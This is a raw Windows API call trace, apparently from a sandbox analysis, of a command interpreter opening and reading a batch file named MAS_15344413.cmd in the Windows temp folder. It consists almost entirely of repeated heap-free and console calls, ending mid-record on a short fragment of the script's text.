_wcsicmp (_String1="_args", _String2="TIME") returned -21 [0179.647] _wcsicmp (_String1="_args", _String2="RANDOM") returned -19 [0179.647] _wcsicmp (_String1="_args", _String2="HIGHESTNUMANODENUMBER") returned -9 [0179.647] _get_osfhandle (_FileHandle=1) returned 0x24 [0179.647] SetConsoleMode (hConsoleHandle=0x24, dwMode=0x7) returned 1 [0179.648] _get_osfhandle (_FileHandle=1) returned 0x24 [0179.648] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x7ff7bd72960c | out: lpMode=0x7ff7bd72960c) returned 1 [0179.648] _get_osfhandle (_FileHandle=0) returned 0x20 [0179.648] GetConsoleMode (in: hConsoleHandle=0x20, lpMode=0x7ff7bd729608 | out: lpMode=0x7ff7bd729608) returned 1 [0179.648] SetConsoleInputExeNameW () returned 0x1 [0179.649] GetConsoleOutputCP () returned 0x1b5 [0179.649] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x7ff7bd729660 | out: lpCPInfo=0x7ff7bd729660) returned 1 [0179.649] SetThreadUILanguage (LangId=0x0) returned 0x409 [0179.649] CreateFileW (lpFileName="C:\\Windows\\Temp\\MAS_15344413.cmd" (normalized: "c:\\windows\\temp\\mas_15344413.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x43f9efeea0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0179.649] _open_osfhandle (_OSFileHandle=0xa0, _Flags=8) returned 3 [0179.650] _get_osfhandle (_FileHandle=3) returned 0xa0 [0179.650] SetFilePointer (in: hFile=0xa0, lDistanceToMove=8400, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x20d0 [0179.650] GetProcessHeap () returned 0x19a8f1e0000 [0179.650] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ec720) returned 1 [0179.650] GetProcessHeap () returned 0x19a8f1e0000 [0179.650] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1f0090) returned 1 [0179.650] GetProcessHeap () returned 0x19a8f1e0000 [0179.650] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f208780) returned 1 [0179.650] GetProcessHeap () returned 0x19a8f1e0000 [0179.651] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f209680) returned 1 [0179.651] GetProcessHeap () returned 0x19a8f1e0000 [0179.651] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1f0120) returned 1 [0179.651] GetProcessHeap () returned 0x19a8f1e0000 [0179.652] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f208180) returned 1 [0179.652] GetProcessHeap () returned 0x19a8f1e0000 [0179.652] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f2207a0) returned 1 [0179.652] GetProcessHeap () returned 0x19a8f1e0000 [0179.652] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1f8f00) returned 1 [0179.652] GetProcessHeap () returned 0x19a8f1e0000 [0179.652] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1f0060) returned 1 [0179.653] GetProcessHeap () returned 0x19a8f1e0000 [0179.653] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f2206e0) returned 1 [0179.653] GetProcessHeap () returned 0x19a8f1e0000 [0179.653] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f220560) returned 1 [0179.653] GetProcessHeap () returned 0x19a8f1e0000 [0179.654] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f220620) returned 1 [0179.654] GetProcessHeap () returned 0x19a8f1e0000 [0179.654] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ec8a0) returned 1 [0179.654] GetProcessHeap () returned 0x19a8f1e0000 [0179.654] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ecb00) returned 1 [0179.654] GetProcessHeap () returned 0x19a8f1e0000 [0179.654] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f220020) returned 1 [0179.654] GetProcessHeap () returned 0x19a8f1e0000 [0179.655] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f21fde0) returned 1 [0179.655] GetProcessHeap () returned 0x19a8f1e0000 [0179.655] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ec6a0) returned 1 [0179.655] GetProcessHeap () returned 0x19a8f1e0000 [0179.655] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1f0030) returned 1 [0179.655] GetProcessHeap () returned 0x19a8f1e0000 [0179.656] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f21fba0) returned 1 [0179.656] GetProcessHeap () returned 0x19a8f1e0000 [0179.656] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f21fae0) returned 1 [0179.656] GetProcessHeap () returned 0x19a8f1e0000 [0179.657] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f21f8a0) returned 1 [0179.657] GetProcessHeap () returned 0x19a8f1e0000 [0179.657] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1e0cf0) returned 1 [0179.657] GetProcessHeap () returned 0x19a8f1e0000 [0179.657] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ecbc0) returned 1 [0179.657] GetProcessHeap () returned 0x19a8f1e0000 [0179.658] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1e0df0) returned 1 [0179.658] GetProcessHeap () returned 0x19a8f1e0000 [0179.658] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ec780) returned 1 [0179.658] GetProcessHeap () returned 0x19a8f1e0000 [0179.658] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1e0930) returned 1 [0179.658] GetProcessHeap () returned 0x19a8f1e0000 [0179.659] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1e0db0) returned 1 [0179.660] GetProcessHeap () returned 0x19a8f1e0000 [0179.660] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eff40) returned 1 [0179.660] GetProcessHeap () returned 0x19a8f1e0000 [0179.661] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f21f7e0) returned 1 [0179.661] GetProcessHeap () returned 0x19a8f1e0000 [0179.661] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f21eee0) returned 1 [0179.661] GetProcessHeap () returned 0x19a8f1e0000 [0179.661] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1f00f0) returned 1 [0179.661] GetProcessHeap () returned 0x19a8f1e0000 [0179.661] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1efbb0) returned 1 [0179.661] GetProcessHeap () returned 0x19a8f1e0000 [0179.662] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f21f720) returned 1 [0179.662] GetProcessHeap () returned 0x19a8f1e0000 [0179.662] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f21f660) returned 1 [0179.662] GetProcessHeap () returned 0x19a8f1e0000 [0179.663] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1f02a0) returned 1 [0179.663] GetProcessHeap () returned 0x19a8f1e0000 [0179.663] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f21fd20) returned 1 [0179.663] GetProcessHeap () returned 0x19a8f1e0000 [0179.664] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f21ee20) returned 1 [0179.664] GetProcessHeap () returned 0x19a8f1e0000 [0179.664] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1f90e0) returned 1 [0179.664] GetProcessHeap () returned 0x19a8f1e0000 [0179.664] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1f0330) returned 1 [0179.664] GetProcessHeap () returned 0x19a8f1e0000 [0179.665] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f21fa20) returned 1 [0179.665] GetProcessHeap () returned 0x19a8f1e0000 [0179.665] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f220920) returned 1 [0179.665] GetProcessHeap () returned 0x19a8f1e0000 [0179.665] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f21fea0) returned 1 [0179.666] GetProcessHeap () returned 0x19a8f1e0000 [0179.666] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ec960) returned 1 [0179.666] GetProcessHeap () returned 0x19a8f1e0000 [0179.666] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ecd40) returned 1 [0179.666] GetProcessHeap () returned 0x19a8f1e0000 [0179.666] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f220ce0) returned 1 [0179.666] GetProcessHeap () returned 0x19a8f1e0000 [0179.667] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f21f5a0) returned 1 [0179.667] GetProcessHeap () returned 0x19a8f1e0000 [0179.667] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ec820) returned 1 [0179.667] GetProcessHeap () returned 0x19a8f1e0000 [0179.667] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1f0000) returned 1 [0179.667] GetProcessHeap () returned 0x19a8f1e0000 [0179.668] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f2204a0) returned 1 [0179.668] GetProcessHeap () returned 0x19a8f1e0000 [0179.668] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f21f420) returned 1 [0179.668] GetProcessHeap () returned 0x19a8f1e0000 [0179.669] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f2201a0) returned 1 [0179.669] GetProcessHeap () returned 0x19a8f1e0000 [0179.669] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1e0f70) returned 1 [0179.669] GetProcessHeap () returned 0x19a8f1e0000 [0179.669] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ec880) returned 1 [0179.669] GetProcessHeap () returned 0x19a8f1e0000 [0179.670] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1e08f0) returned 1 [0179.670] GetProcessHeap () returned 0x19a8f1e0000 [0179.670] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eca00) returned 1 [0179.670] GetProcessHeap () returned 0x19a8f1e0000 [0179.671] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1e0a70) returned 1 [0179.671] GetProcessHeap () returned 0x19a8f1e0000 [0179.671] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1e08b0) returned 1 [0179.671] GetProcessHeap () returned 0x19a8f1e0000 [0179.671] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1effa0) returned 1 [0179.671] GetProcessHeap () returned 0x19a8f1e0000 [0179.672] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f21f360) returned 1 [0179.672] GetProcessHeap () returned 0x19a8f1e0000 [0179.672] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f21f960) returned 1 [0179.672] GetProcessHeap () returned 0x19a8f1e0000 [0179.672] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1f0300) returned 1 [0179.672] GetProcessHeap () returned 0x19a8f1e0000 [0179.672] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eff10) returned 1 [0179.672] GetProcessHeap () returned 0x19a8f1e0000 [0179.672] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f21f4e0) returned 1 [0179.672] GetProcessHeap () returned 0x19a8f1e0000 [0179.673] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f2200e0) returned 1 [0179.673] GetProcessHeap () returned 0x19a8f1e0000 [0179.673] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1efe80) returned 1 [0179.673] GetProcessHeap () returned 0x19a8f1e0000 [0179.674] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f220260) returned 1 [0179.674] GetProcessHeap () returned 0x19a8f1e0000 [0179.674] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f2203e0) returned 1 [0179.674] GetProcessHeap () returned 0x19a8f1e0000 [0179.674] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1f9040) returned 1 [0179.674] GetProcessHeap () returned 0x19a8f1e0000 [0179.674] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1effd0) returned 1 [0179.674] GetProcessHeap () returned 0x19a8f1e0000 [0179.675] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f21efa0) returned 1 [0179.675] GetProcessHeap () returned 0x19a8f1e0000 [0179.676] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f220320) returned 1 [0179.676] GetProcessHeap () returned 0x19a8f1e0000 [0179.676] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f21f2a0) returned 1 [0179.676] GetProcessHeap () returned 0x19a8f1e0000 [0179.676] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ec7c0) returned 1 [0179.676] GetProcessHeap () returned 0x19a8f1e0000 [0179.676] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ecc00) returned 1 [0179.676] GetProcessHeap () returned 0x19a8f1e0000 [0179.676] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f220860) returned 1 [0179.676] GetProcessHeap () returned 0x19a8f1e0000 [0179.677] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f220c20) returned 1 [0179.677] GetProcessHeap () returned 0x19a8f1e0000 [0179.677] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ecc80) returned 1 [0179.677] GetProcessHeap () returned 0x19a8f1e0000 [0179.677] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1efeb0) returned 1 [0179.677] GetProcessHeap () returned 0x19a8f1e0000 [0179.678] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f21fc60) returned 1 [0179.678] GetProcessHeap () returned 0x19a8f1e0000 [0179.678] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f21f120) returned 1 [0179.678] GetProcessHeap () returned 0x19a8f1e0000 [0179.678] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f220b60) returned 1 [0179.679] GetProcessHeap () returned 0x19a8f1e0000 [0179.679] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1e0cb0) returned 1 [0179.679] GetProcessHeap () returned 0x19a8f1e0000 [0179.679] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ecac0) returned 1 [0179.679] GetProcessHeap () returned 0x19a8f1e0000 [0179.680] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1e0ef0) returned 1 [0179.680] GetProcessHeap () returned 0x19a8f1e0000 [0179.680] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ecca0) returned 1 [0179.680] GetProcessHeap () returned 0x19a8f1e0000 [0179.681] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1e0c30) returned 1 [0179.681] GetProcessHeap () returned 0x19a8f1e0000 [0179.681] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1e0f30) returned 1 [0179.681] GetProcessHeap () returned 0x19a8f1e0000 [0179.681] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1efbe0) returned 1 [0179.681] GetProcessHeap () returned 0x19a8f1e0000 [0179.682] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f21f1e0) returned 1 [0179.682] GetProcessHeap () returned 0x19a8f1e0000 [0179.682] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f21ff60) returned 1 [0179.682] GetProcessHeap () returned 0x19a8f1e0000 [0179.682] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eff70) returned 1 [0179.682] GetProcessHeap () returned 0x19a8f1e0000 [0179.683] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1efee0) returned 1 [0179.683] GetProcessHeap () returned 0x19a8f1e0000 [0179.683] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f220aa0) returned 1 [0179.683] GetProcessHeap () returned 0x19a8f1e0000 [0179.683] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f2209e0) returned 1 [0179.683] GetProcessHeap () returned 0x19a8f1e0000 [0179.684] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1efdf0) returned 1 [0179.684] GetProcessHeap () returned 0x19a8f1e0000 [0179.684] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f21f060) returned 1 [0179.685] GetProcessHeap () returned 0x19a8f1e0000 [0179.686] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ee550) returned 1 [0179.686] GetProcessHeap () returned 0x19a8f1e0000 [0179.686] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1f8eb0) returned 1 [0179.686] GetProcessHeap () returned 0x19a8f1e0000 [0179.686] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1f0180) returned 1 [0179.686] GetProcessHeap () returned 0x19a8f1e0000 [0179.687] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ee490) returned 1 [0179.687] GetProcessHeap () returned 0x19a8f1e0000 [0179.687] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ee3d0) returned 1 [0179.687] GetProcessHeap () returned 0x19a8f1e0000 [0179.688] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ee250) returned 1 [0179.688] GetProcessHeap () returned 0x19a8f1e0000 [0179.688] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ec700) returned 1 [0179.688] GetProcessHeap () returned 0x19a8f1e0000 [0179.688] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ec740) returned 1 [0179.688] GetProcessHeap () returned 0x19a8f1e0000 [0179.688] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ee190) returned 1 [0179.688] GetProcessHeap () returned 0x19a8f1e0000 [0179.688] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ee910) returned 1 [0179.688] GetProcessHeap () returned 0x19a8f1e0000 [0179.688] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ec840) returned 1 [0179.689] GetProcessHeap () returned 0x19a8f1e0000 [0179.689] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1f00c0) returned 1 [0179.689] GetProcessHeap () returned 0x19a8f1e0000 [0179.689] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ee850) returned 1 [0179.689] GetProcessHeap () returned 0x19a8f1e0000 [0179.690] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ee0d0) returned 1 [0179.690] GetProcessHeap () returned 0x19a8f1e0000 [0179.690] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ee010) returned 1 [0179.691] GetProcessHeap () returned 0x19a8f1e0000 [0179.691] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1e0fb0) returned 1 [0179.691] GetProcessHeap () returned 0x19a8f1e0000 [0179.691] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ec900) returned 1 [0179.691] GetProcessHeap () returned 0x19a8f1e0000 [0179.692] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1e0a30) returned 1 [0179.692] GetProcessHeap () returned 0x19a8f1e0000 [0179.692] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ecb60) returned 1 [0179.692] GetProcessHeap () returned 0x19a8f1e0000 [0179.692] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1e0ff0) returned 1 [0179.692] GetProcessHeap () returned 0x19a8f1e0000 [0179.692] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1e0970) returned 1 [0179.692] GetProcessHeap () returned 0x19a8f1e0000 [0179.692] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb6e0) returned 1 [0179.692] GetProcessHeap () returned 0x19a8f1e0000 [0179.693] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ede90) returned 1 [0179.693] GetProcessHeap () returned 0x19a8f1e0000 [0179.693] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1edf50) returned 1 [0179.693] GetProcessHeap () returned 0x19a8f1e0000 [0179.693] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb6b0) returned 1 [0179.693] GetProcessHeap () returned 0x19a8f1e0000 [0179.693] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb980) returned 1 [0179.693] GetProcessHeap () returned 0x19a8f1e0000 [0179.693] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eddd0) returned 1 [0179.693] GetProcessHeap () returned 0x19a8f1e0000 [0179.694] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1edd10) returned 1 [0179.694] GetProcessHeap () returned 0x19a8f1e0000 [0179.694] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1edb90) returned 1 [0179.694] GetProcessHeap () returned 0x19a8f1e0000 [0179.694] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb740) returned 1 [0179.694] GetProcessHeap () returned 0x19a8f1e0000 [0179.694] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ec860) returned 1 [0179.695] GetProcessHeap () returned 0x19a8f1e0000 [0179.695] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1e0e70) returned 1 [0179.695] GetProcessHeap () returned 0x19a8f1e0000 [0179.695] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ecba0) returned 1 [0179.695] GetProcessHeap () returned 0x19a8f1e0000 [0179.696] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1e09f0) returned 1 [0179.696] GetProcessHeap () returned 0x19a8f1e0000 [0179.696] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb710) returned 1 [0179.696] GetProcessHeap () returned 0x19a8f1e0000 [0179.696] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb950) returned 1 [0179.696] GetProcessHeap () returned 0x19a8f1e0000 [0179.697] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ee790) returned 1 [0179.697] GetProcessHeap () returned 0x19a8f1e0000 [0179.697] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ee6d0) returned 1 [0179.697] GetProcessHeap () returned 0x19a8f1e0000 [0179.697] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb920) returned 1 [0179.697] GetProcessHeap () returned 0x19a8f1e0000 [0179.697] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb860) returned 1 [0179.697] GetProcessHeap () returned 0x19a8f1e0000 [0179.698] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1edc50) returned 1 [0179.698] GetProcessHeap () returned 0x19a8f1e0000 [0179.698] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb8f0) returned 1 [0179.698] GetProcessHeap () returned 0x19a8f1e0000 [0179.698] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb9e0) returned 1 [0179.698] GetProcessHeap () returned 0x19a8f1e0000 [0179.698] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb770) returned 1 [0179.698] GetProcessHeap () returned 0x19a8f1e0000 [0179.698] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ee310) returned 1 [0179.698] GetProcessHeap () returned 0x19a8f1e0000 [0179.698] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb800) returned 1 [0179.698] GetProcessHeap () returned 0x19a8f1e0000 [0179.698] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ec800) returned 1 [0179.698] GetProcessHeap () returned 0x19a8f1e0000 [0179.699] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ee9d0) returned 1 [0179.699] _get_osfhandle (_FileHandle=3) returned 0xa0 [0179.699] SetFilePointer (in: hFile=0xa0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x20d0 [0179.699] ReadFile (in: hFile=0xa0, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efee60, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efee60*=0x1fff, lpOverlapped=0x0) returned 1 [0179.699] SetFilePointer (in: hFile=0xa0, lDistanceToMove=8402, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x20d2 [0179.699] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="\r\n", cbMultiByte=2, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="\r\n\nt /b\r\nrgs%\" | find /i 